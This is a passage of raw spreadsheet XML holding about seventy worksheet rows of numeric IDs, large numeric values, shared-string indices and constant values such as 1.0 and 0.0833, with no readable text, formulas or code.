      <c r="A33982" s="1">
        <v>15962.0</v>
      </c>
      <c r="B33982" s="2">
        <v>4.4779355E7</v>
      </c>
      <c r="C33982" s="2" t="s">
        <v>32718</v>
      </c>
      <c r="D33982" s="2">
        <v>1.0</v>
      </c>
      <c r="E33982" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33982" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33983" ht="15.75" customHeight="1">
      <c r="A33983" s="1">
        <v>15978.0</v>
      </c>
      <c r="B33983" s="2">
        <v>4.4884524E7</v>
      </c>
      <c r="C33983" s="2" t="s">
        <v>32719</v>
      </c>
      <c r="D33983" s="2">
        <v>1.0</v>
      </c>
      <c r="E33983" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33983" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33984" ht="15.75" customHeight="1">
      <c r="A33984" s="1">
        <v>16078.0</v>
      </c>
      <c r="B33984" s="2">
        <v>4.5354943E7</v>
      </c>
      <c r="C33984" s="2" t="s">
        <v>32720</v>
      </c>
      <c r="D33984" s="2">
        <v>1.0</v>
      </c>
      <c r="E33984" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33984" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33985" ht="15.75" customHeight="1">
      <c r="A33985" s="1">
        <v>16082.0</v>
      </c>
      <c r="B33985" s="2">
        <v>4.5367841E7</v>
      </c>
      <c r="C33985" s="2" t="s">
        <v>32721</v>
      </c>
      <c r="D33985" s="2">
        <v>1.0</v>
      </c>
      <c r="E33985" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33985" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33986" ht="15.75" customHeight="1">
      <c r="A33986" s="1">
        <v>16238.0</v>
      </c>
      <c r="B33986" s="2">
        <v>4.5765383E7</v>
      </c>
      <c r="C33986" s="2" t="s">
        <v>32722</v>
      </c>
      <c r="D33986" s="2">
        <v>1.0</v>
      </c>
      <c r="E33986" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33986" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33987" ht="15.75" customHeight="1">
      <c r="A33987" s="1">
        <v>16305.0</v>
      </c>
      <c r="B33987" s="2">
        <v>4.5912638E7</v>
      </c>
      <c r="C33987" s="2" t="s">
        <v>32723</v>
      </c>
      <c r="D33987" s="2">
        <v>1.0</v>
      </c>
      <c r="E33987" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33987" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33988" ht="15.75" customHeight="1">
      <c r="A33988" s="1">
        <v>16322.0</v>
      </c>
      <c r="B33988" s="2">
        <v>4.5986226E7</v>
      </c>
      <c r="C33988" s="2" t="s">
        <v>32724</v>
      </c>
      <c r="D33988" s="2">
        <v>1.0</v>
      </c>
      <c r="E33988" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33988" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33989" ht="15.75" customHeight="1">
      <c r="A33989" s="1">
        <v>16345.0</v>
      </c>
      <c r="B33989" s="2">
        <v>4.6083023E7</v>
      </c>
      <c r="C33989" s="2" t="s">
        <v>32725</v>
      </c>
      <c r="D33989" s="2">
        <v>1.0</v>
      </c>
      <c r="E33989" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33989" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33990" ht="15.75" customHeight="1">
      <c r="A33990" s="1">
        <v>16375.0</v>
      </c>
      <c r="B33990" s="2">
        <v>4.616895E7</v>
      </c>
      <c r="C33990" s="2" t="s">
        <v>32726</v>
      </c>
      <c r="D33990" s="2">
        <v>1.0</v>
      </c>
      <c r="E33990" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33990" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33991" ht="15.75" customHeight="1">
      <c r="A33991" s="1">
        <v>16379.0</v>
      </c>
      <c r="B33991" s="2">
        <v>4.6188362E7</v>
      </c>
      <c r="C33991" s="2" t="s">
        <v>32727</v>
      </c>
      <c r="D33991" s="2">
        <v>1.0</v>
      </c>
      <c r="E33991" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33991" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33992" ht="15.75" customHeight="1">
      <c r="A33992" s="1">
        <v>16428.0</v>
      </c>
      <c r="B33992" s="2">
        <v>4.6334472E7</v>
      </c>
      <c r="C33992" s="2" t="s">
        <v>32728</v>
      </c>
      <c r="D33992" s="2">
        <v>1.0</v>
      </c>
      <c r="E33992" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33992" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33993" ht="15.75" customHeight="1">
      <c r="A33993" s="1">
        <v>16486.0</v>
      </c>
      <c r="B33993" s="2">
        <v>4.6538778E7</v>
      </c>
      <c r="C33993" s="2" t="s">
        <v>32729</v>
      </c>
      <c r="D33993" s="2">
        <v>1.0</v>
      </c>
      <c r="E33993" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33993" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33994" ht="15.75" customHeight="1">
      <c r="A33994" s="1">
        <v>16570.0</v>
      </c>
      <c r="B33994" s="2">
        <v>4.6868032E7</v>
      </c>
      <c r="C33994" s="2" t="s">
        <v>32730</v>
      </c>
      <c r="D33994" s="2">
        <v>1.0</v>
      </c>
      <c r="E33994" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33994" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33995" ht="15.75" customHeight="1">
      <c r="A33995" s="1">
        <v>16587.0</v>
      </c>
      <c r="B33995" s="2">
        <v>4.6936099E7</v>
      </c>
      <c r="C33995" s="2" t="s">
        <v>32731</v>
      </c>
      <c r="D33995" s="2">
        <v>1.0</v>
      </c>
      <c r="E33995" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33995" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33996" ht="15.75" customHeight="1">
      <c r="A33996" s="1">
        <v>16588.0</v>
      </c>
      <c r="B33996" s="2">
        <v>4.6955911E7</v>
      </c>
      <c r="C33996" s="2" t="s">
        <v>32732</v>
      </c>
      <c r="D33996" s="2">
        <v>1.0</v>
      </c>
      <c r="E33996" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33996" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33997" ht="15.75" customHeight="1">
      <c r="A33997" s="1">
        <v>16650.0</v>
      </c>
      <c r="B33997" s="2">
        <v>4719527.0</v>
      </c>
      <c r="C33997" s="2" t="s">
        <v>32432</v>
      </c>
      <c r="D33997" s="2">
        <v>1.0</v>
      </c>
      <c r="E33997" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33997" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33998" ht="15.75" customHeight="1">
      <c r="A33998" s="1">
        <v>16690.0</v>
      </c>
      <c r="B33998" s="2">
        <v>4.7330704E7</v>
      </c>
      <c r="C33998" s="2" t="s">
        <v>32733</v>
      </c>
      <c r="D33998" s="2">
        <v>1.0</v>
      </c>
      <c r="E33998" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33998" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33999" ht="15.75" customHeight="1">
      <c r="A33999" s="1">
        <v>16723.0</v>
      </c>
      <c r="B33999" s="2">
        <v>4.7475515E7</v>
      </c>
      <c r="C33999" s="2" t="s">
        <v>32734</v>
      </c>
      <c r="D33999" s="2">
        <v>1.0</v>
      </c>
      <c r="E33999" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33999" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34000" ht="15.75" customHeight="1">
      <c r="A34000" s="1">
        <v>16761.0</v>
      </c>
      <c r="B34000" s="2">
        <v>4.7608935E7</v>
      </c>
      <c r="C34000" s="2" t="s">
        <v>32735</v>
      </c>
      <c r="D34000" s="2">
        <v>1.0</v>
      </c>
      <c r="E34000" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34000" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34001" ht="15.75" customHeight="1">
      <c r="A34001" s="1">
        <v>16765.0</v>
      </c>
      <c r="B34001" s="2">
        <v>4.7640278E7</v>
      </c>
      <c r="C34001" s="2" t="s">
        <v>32736</v>
      </c>
      <c r="D34001" s="2">
        <v>1.0</v>
      </c>
      <c r="E34001" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34001" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34002" ht="15.75" customHeight="1">
      <c r="A34002" s="1">
        <v>16780.0</v>
      </c>
      <c r="B34002" s="2">
        <v>4.7736792E7</v>
      </c>
      <c r="C34002" s="2" t="s">
        <v>32737</v>
      </c>
      <c r="D34002" s="2">
        <v>1.0</v>
      </c>
      <c r="E34002" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34002" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34003" ht="15.75" customHeight="1">
      <c r="A34003" s="1">
        <v>16782.0</v>
      </c>
      <c r="B34003" s="2">
        <v>4.7737286E7</v>
      </c>
      <c r="C34003" s="5" t="s">
        <v>32738</v>
      </c>
      <c r="D34003" s="2">
        <v>1.0</v>
      </c>
      <c r="E34003" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34003" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34004" ht="15.75" customHeight="1">
      <c r="A34004" s="1">
        <v>16789.0</v>
      </c>
      <c r="B34004" s="2">
        <v>4.7750743E7</v>
      </c>
      <c r="C34004" s="2" t="s">
        <v>32739</v>
      </c>
      <c r="D34004" s="2">
        <v>1.0</v>
      </c>
      <c r="E34004" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34004" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34005" ht="15.75" customHeight="1">
      <c r="A34005" s="1">
        <v>16820.0</v>
      </c>
      <c r="B34005" s="2">
        <v>4.7857937E7</v>
      </c>
      <c r="C34005" s="2" t="s">
        <v>32740</v>
      </c>
      <c r="D34005" s="2">
        <v>1.0</v>
      </c>
      <c r="E34005" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34005" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34006" ht="15.75" customHeight="1">
      <c r="A34006" s="1">
        <v>16850.0</v>
      </c>
      <c r="B34006" s="2">
        <v>4.7910396E7</v>
      </c>
      <c r="C34006" s="2" t="s">
        <v>32741</v>
      </c>
      <c r="D34006" s="2">
        <v>1.0</v>
      </c>
      <c r="E34006" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34006" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34007" ht="15.75" customHeight="1">
      <c r="A34007" s="1">
        <v>16876.0</v>
      </c>
      <c r="B34007" s="2">
        <v>4.7966746E7</v>
      </c>
      <c r="C34007" s="2" t="s">
        <v>32742</v>
      </c>
      <c r="D34007" s="2">
        <v>1.0</v>
      </c>
      <c r="E34007" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34007" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34008" ht="15.75" customHeight="1">
      <c r="A34008" s="1">
        <v>16918.0</v>
      </c>
      <c r="B34008" s="2">
        <v>4.8137942E7</v>
      </c>
      <c r="C34008" s="2" t="s">
        <v>32743</v>
      </c>
      <c r="D34008" s="2">
        <v>1.0</v>
      </c>
      <c r="E34008" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34008" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34009" ht="15.75" customHeight="1">
      <c r="A34009" s="1">
        <v>17132.0</v>
      </c>
      <c r="B34009" s="2">
        <v>4.882933E7</v>
      </c>
      <c r="C34009" s="2" t="s">
        <v>32744</v>
      </c>
      <c r="D34009" s="2">
        <v>1.0</v>
      </c>
      <c r="E34009" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34009" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34010" ht="15.75" customHeight="1">
      <c r="A34010" s="1">
        <v>17196.0</v>
      </c>
      <c r="B34010" s="2">
        <v>4.8954429E7</v>
      </c>
      <c r="C34010" s="2" t="s">
        <v>32745</v>
      </c>
      <c r="D34010" s="2">
        <v>1.0</v>
      </c>
      <c r="E34010" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34010" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34011" ht="15.75" customHeight="1">
      <c r="A34011" s="1">
        <v>17203.0</v>
      </c>
      <c r="B34011" s="2">
        <v>4.901572E7</v>
      </c>
      <c r="C34011" s="2" t="s">
        <v>32746</v>
      </c>
      <c r="D34011" s="2">
        <v>1.0</v>
      </c>
      <c r="E34011" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34011" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34012" ht="15.75" customHeight="1">
      <c r="A34012" s="1">
        <v>17286.0</v>
      </c>
      <c r="B34012" s="2">
        <v>4.9214289E7</v>
      </c>
      <c r="C34012" s="2" t="s">
        <v>32747</v>
      </c>
      <c r="D34012" s="2">
        <v>1.0</v>
      </c>
      <c r="E34012" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34012" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34013" ht="15.75" customHeight="1">
      <c r="A34013" s="1">
        <v>17320.0</v>
      </c>
      <c r="B34013" s="2">
        <v>4.9339121E7</v>
      </c>
      <c r="C34013" s="2" t="s">
        <v>32748</v>
      </c>
      <c r="D34013" s="2">
        <v>1.0</v>
      </c>
      <c r="E34013" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34013" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34014" ht="15.75" customHeight="1">
      <c r="A34014" s="1">
        <v>17404.0</v>
      </c>
      <c r="B34014" s="2">
        <v>4.9641546E7</v>
      </c>
      <c r="C34014" s="2" t="s">
        <v>32749</v>
      </c>
      <c r="D34014" s="2">
        <v>1.0</v>
      </c>
      <c r="E34014" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34014" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34015" ht="15.75" customHeight="1">
      <c r="A34015" s="1">
        <v>17513.0</v>
      </c>
      <c r="B34015" s="2">
        <v>5.0032609E7</v>
      </c>
      <c r="C34015" s="2" t="s">
        <v>32750</v>
      </c>
      <c r="D34015" s="2">
        <v>1.0</v>
      </c>
      <c r="E34015" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34015" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34016" ht="15.75" customHeight="1">
      <c r="A34016" s="1">
        <v>17524.0</v>
      </c>
      <c r="B34016" s="2">
        <v>5.0092927E7</v>
      </c>
      <c r="C34016" s="2" t="s">
        <v>32751</v>
      </c>
      <c r="D34016" s="2">
        <v>1.0</v>
      </c>
      <c r="E34016" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34016" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34017" ht="15.75" customHeight="1">
      <c r="A34017" s="1">
        <v>17548.0</v>
      </c>
      <c r="B34017" s="2">
        <v>5.0196082E7</v>
      </c>
      <c r="C34017" s="2" t="s">
        <v>32752</v>
      </c>
      <c r="D34017" s="2">
        <v>1.0</v>
      </c>
      <c r="E34017" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34017" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34018" ht="15.75" customHeight="1">
      <c r="A34018" s="1">
        <v>17564.0</v>
      </c>
      <c r="B34018" s="2">
        <v>5.0244733E7</v>
      </c>
      <c r="C34018" s="2" t="s">
        <v>32753</v>
      </c>
      <c r="D34018" s="2">
        <v>1.0</v>
      </c>
      <c r="E34018" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34018" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34019" ht="15.75" customHeight="1">
      <c r="A34019" s="1">
        <v>17586.0</v>
      </c>
      <c r="B34019" s="2">
        <v>5.0289048E7</v>
      </c>
      <c r="C34019" s="2" t="s">
        <v>32754</v>
      </c>
      <c r="D34019" s="2">
        <v>1.0</v>
      </c>
      <c r="E34019" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34019" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34020" ht="15.75" customHeight="1">
      <c r="A34020" s="1">
        <v>17595.0</v>
      </c>
      <c r="B34020" s="2">
        <v>5.0331816E7</v>
      </c>
      <c r="C34020" s="2" t="s">
        <v>32755</v>
      </c>
      <c r="D34020" s="2">
        <v>1.0</v>
      </c>
      <c r="E34020" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34020" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34021" ht="15.75" customHeight="1">
      <c r="A34021" s="1">
        <v>17639.0</v>
      </c>
      <c r="B34021" s="2">
        <v>5.0401051E7</v>
      </c>
      <c r="C34021" s="2" t="s">
        <v>32756</v>
      </c>
      <c r="D34021" s="2">
        <v>1.0</v>
      </c>
      <c r="E34021" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34021" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34022" ht="15.75" customHeight="1">
      <c r="A34022" s="1">
        <v>17680.0</v>
      </c>
      <c r="B34022" s="2">
        <v>5.0493289E7</v>
      </c>
      <c r="C34022" s="2" t="s">
        <v>32757</v>
      </c>
      <c r="D34022" s="2">
        <v>1.0</v>
      </c>
      <c r="E34022" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34022" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34023" ht="15.75" customHeight="1">
      <c r="A34023" s="1">
        <v>17687.0</v>
      </c>
      <c r="B34023" s="2">
        <v>5.0504483E7</v>
      </c>
      <c r="C34023" s="2" t="s">
        <v>32758</v>
      </c>
      <c r="D34023" s="2">
        <v>1.0</v>
      </c>
      <c r="E34023" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34023" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34024" ht="15.75" customHeight="1">
      <c r="A34024" s="1">
        <v>17764.0</v>
      </c>
      <c r="B34024" s="2">
        <v>5.0737172E7</v>
      </c>
      <c r="C34024" s="2" t="s">
        <v>32759</v>
      </c>
      <c r="D34024" s="2">
        <v>1.0</v>
      </c>
      <c r="E34024" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34024" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34025" ht="15.75" customHeight="1">
      <c r="A34025" s="1">
        <v>17854.0</v>
      </c>
      <c r="B34025" s="2">
        <v>5.0984021E7</v>
      </c>
      <c r="C34025" s="2" t="s">
        <v>32760</v>
      </c>
      <c r="D34025" s="2">
        <v>1.0</v>
      </c>
      <c r="E34025" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34025" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34026" ht="15.75" customHeight="1">
      <c r="A34026" s="1">
        <v>17987.0</v>
      </c>
      <c r="B34026" s="2">
        <v>5.1392529E7</v>
      </c>
      <c r="C34026" s="2" t="s">
        <v>32761</v>
      </c>
      <c r="D34026" s="2">
        <v>1.0</v>
      </c>
      <c r="E34026" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34026" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34027" ht="15.75" customHeight="1">
      <c r="A34027" s="1">
        <v>17995.0</v>
      </c>
      <c r="B34027" s="2">
        <v>5.1400735E7</v>
      </c>
      <c r="C34027" s="2" t="s">
        <v>32762</v>
      </c>
      <c r="D34027" s="2">
        <v>1.0</v>
      </c>
      <c r="E34027" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34027" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34028" ht="15.75" customHeight="1">
      <c r="A34028" s="1">
        <v>18092.0</v>
      </c>
      <c r="B34028" s="2">
        <v>5.168944E7</v>
      </c>
      <c r="C34028" s="2" t="s">
        <v>32763</v>
      </c>
      <c r="D34028" s="2">
        <v>1.0</v>
      </c>
      <c r="E34028" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34028" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34029" ht="15.75" customHeight="1">
      <c r="A34029" s="1">
        <v>18103.0</v>
      </c>
      <c r="B34029" s="2">
        <v>5.1719672E7</v>
      </c>
      <c r="C34029" s="2" t="s">
        <v>32764</v>
      </c>
      <c r="D34029" s="2">
        <v>1.0</v>
      </c>
      <c r="E34029" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34029" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34030" ht="15.75" customHeight="1">
      <c r="A34030" s="1">
        <v>18104.0</v>
      </c>
      <c r="B34030" s="2">
        <v>5.1719672E7</v>
      </c>
      <c r="C34030" s="2" t="s">
        <v>32765</v>
      </c>
      <c r="D34030" s="2">
        <v>1.0</v>
      </c>
      <c r="E34030" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34030" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34031" ht="15.75" customHeight="1">
      <c r="A34031" s="1">
        <v>18126.0</v>
      </c>
      <c r="B34031" s="2">
        <v>5.1782444E7</v>
      </c>
      <c r="C34031" s="2" t="s">
        <v>32766</v>
      </c>
      <c r="D34031" s="2">
        <v>1.0</v>
      </c>
      <c r="E34031" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34031" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34032" ht="15.75" customHeight="1">
      <c r="A34032" s="1">
        <v>18151.0</v>
      </c>
      <c r="B34032" s="2">
        <v>5.1862084E7</v>
      </c>
      <c r="C34032" s="2" t="s">
        <v>32767</v>
      </c>
      <c r="D34032" s="2">
        <v>1.0</v>
      </c>
      <c r="E34032" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34032" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34033" ht="15.75" customHeight="1">
      <c r="A34033" s="1">
        <v>18194.0</v>
      </c>
      <c r="B34033" s="2">
        <v>5.2033461E7</v>
      </c>
      <c r="C34033" s="2" t="s">
        <v>32768</v>
      </c>
      <c r="D34033" s="2">
        <v>1.0</v>
      </c>
      <c r="E34033" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34033" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34034" ht="15.75" customHeight="1">
      <c r="A34034" s="1">
        <v>18195.0</v>
      </c>
      <c r="B34034" s="2">
        <v>5.2033461E7</v>
      </c>
      <c r="C34034" s="2" t="s">
        <v>32769</v>
      </c>
      <c r="D34034" s="2">
        <v>1.0</v>
      </c>
      <c r="E34034" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34034" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34035" ht="15.75" customHeight="1">
      <c r="A34035" s="1">
        <v>18219.0</v>
      </c>
      <c r="B34035" s="2">
        <v>5.2099169E7</v>
      </c>
      <c r="C34035" s="2" t="s">
        <v>32770</v>
      </c>
      <c r="D34035" s="2">
        <v>1.0</v>
      </c>
      <c r="E34035" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34035" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34036" ht="15.75" customHeight="1">
      <c r="A34036" s="1">
        <v>18223.0</v>
      </c>
      <c r="B34036" s="2">
        <v>5.2106152E7</v>
      </c>
      <c r="C34036" s="2" t="s">
        <v>32771</v>
      </c>
      <c r="D34036" s="2">
        <v>1.0</v>
      </c>
      <c r="E34036" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34036" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34037" ht="15.75" customHeight="1">
      <c r="A34037" s="1">
        <v>18230.0</v>
      </c>
      <c r="B34037" s="2">
        <v>5.2108671E7</v>
      </c>
      <c r="C34037" s="2" t="s">
        <v>32772</v>
      </c>
      <c r="D34037" s="2">
        <v>1.0</v>
      </c>
      <c r="E34037" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34037" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34038" ht="15.75" customHeight="1">
      <c r="A34038" s="1">
        <v>18292.0</v>
      </c>
      <c r="B34038" s="2">
        <v>5.2303128E7</v>
      </c>
      <c r="C34038" s="2" t="s">
        <v>32773</v>
      </c>
      <c r="D34038" s="2">
        <v>1.0</v>
      </c>
      <c r="E34038" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34038" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34039" ht="15.75" customHeight="1">
      <c r="A34039" s="1">
        <v>18299.0</v>
      </c>
      <c r="B34039" s="2">
        <v>5.2325442E7</v>
      </c>
      <c r="C34039" s="2" t="s">
        <v>32774</v>
      </c>
      <c r="D34039" s="2">
        <v>1.0</v>
      </c>
      <c r="E34039" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34039" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34040" ht="15.75" customHeight="1">
      <c r="A34040" s="1">
        <v>18393.0</v>
      </c>
      <c r="B34040" s="2">
        <v>5.2611339E7</v>
      </c>
      <c r="C34040" s="2" t="s">
        <v>32775</v>
      </c>
      <c r="D34040" s="2">
        <v>1.0</v>
      </c>
      <c r="E34040" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34040" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34041" ht="15.75" customHeight="1">
      <c r="A34041" s="1">
        <v>18425.0</v>
      </c>
      <c r="B34041" s="2">
        <v>5.2716E7</v>
      </c>
      <c r="C34041" s="2" t="s">
        <v>32776</v>
      </c>
      <c r="D34041" s="2">
        <v>1.0</v>
      </c>
      <c r="E34041" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34041" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34042" ht="15.75" customHeight="1">
      <c r="A34042" s="1">
        <v>18550.0</v>
      </c>
      <c r="B34042" s="2">
        <v>5.3138943E7</v>
      </c>
      <c r="C34042" s="2" t="s">
        <v>32777</v>
      </c>
      <c r="D34042" s="2">
        <v>1.0</v>
      </c>
      <c r="E34042" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34042" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34043" ht="15.75" customHeight="1">
      <c r="A34043" s="1">
        <v>18755.0</v>
      </c>
      <c r="B34043" s="2">
        <v>5.3784846E7</v>
      </c>
      <c r="C34043" s="2" t="s">
        <v>32778</v>
      </c>
      <c r="D34043" s="2">
        <v>1.0</v>
      </c>
      <c r="E34043" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34043" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34044" ht="15.75" customHeight="1">
      <c r="A34044" s="1">
        <v>18793.0</v>
      </c>
      <c r="B34044" s="2">
        <v>5.3846156E7</v>
      </c>
      <c r="C34044" s="2" t="s">
        <v>32779</v>
      </c>
      <c r="D34044" s="2">
        <v>1.0</v>
      </c>
      <c r="E34044" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34044" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34045" ht="15.75" customHeight="1">
      <c r="A34045" s="1">
        <v>18819.0</v>
      </c>
      <c r="B34045" s="2">
        <v>5.3922953E7</v>
      </c>
      <c r="C34045" s="2" t="s">
        <v>32780</v>
      </c>
      <c r="D34045" s="2">
        <v>1.0</v>
      </c>
      <c r="E34045" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34045" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34046" ht="15.75" customHeight="1">
      <c r="A34046" s="1">
        <v>18858.0</v>
      </c>
      <c r="B34046" s="2">
        <v>5.3984752E7</v>
      </c>
      <c r="C34046" s="2" t="s">
        <v>32781</v>
      </c>
      <c r="D34046" s="2">
        <v>1.0</v>
      </c>
      <c r="E34046" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34046" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34047" ht="15.75" customHeight="1">
      <c r="A34047" s="1">
        <v>18956.0</v>
      </c>
      <c r="B34047" s="2">
        <v>5.4353785E7</v>
      </c>
      <c r="C34047" s="2" t="s">
        <v>32782</v>
      </c>
      <c r="D34047" s="2">
        <v>1.0</v>
      </c>
      <c r="E34047" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34047" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34048" ht="15.75" customHeight="1">
      <c r="A34048" s="1">
        <v>19035.0</v>
      </c>
      <c r="B34048" s="2">
        <v>5.4560339E7</v>
      </c>
      <c r="C34048" s="2" t="s">
        <v>32783</v>
      </c>
      <c r="D34048" s="2">
        <v>1.0</v>
      </c>
      <c r="E34048" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34048" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
